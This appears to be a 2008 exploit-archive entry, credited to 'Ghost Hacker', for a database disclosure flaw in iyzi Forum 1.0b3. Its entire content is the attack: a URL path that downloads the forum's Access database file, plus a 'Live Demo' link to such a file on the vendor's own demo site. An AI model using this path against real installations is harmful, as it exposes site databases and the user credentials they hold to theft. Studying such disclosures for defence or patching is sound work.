id: 4442
date: 12/14/2008
title: iyzi Forum 1.0b3 (iyziforum.mdb) Database Disclosure Vulnerability
author: Ghost Hacker
cves: 

==================================================================
iyzi Forum 1.0b3 (iyziforum.mdb) Database Disclosure Vulnerability
==================================================================



####################################################################################################
# iyzi Forum (db/iyziforum.mdb) Database Disclosure Vulnerability                                  #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Name Script : iyzi Forum                                                                      #
#[~] Download : http://www.iyziforum.com/                                                          #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/db/iyziforum.mdb                                                          #
#[~]Live Demo     &nb sp;                                                                          #
# http://www.iyziforum.com/demos/kJd32D33J11lOk6f7n2/db/iyziforum.mdb                              #
####################################################################################################



#  0day.today [2023-03-22]  #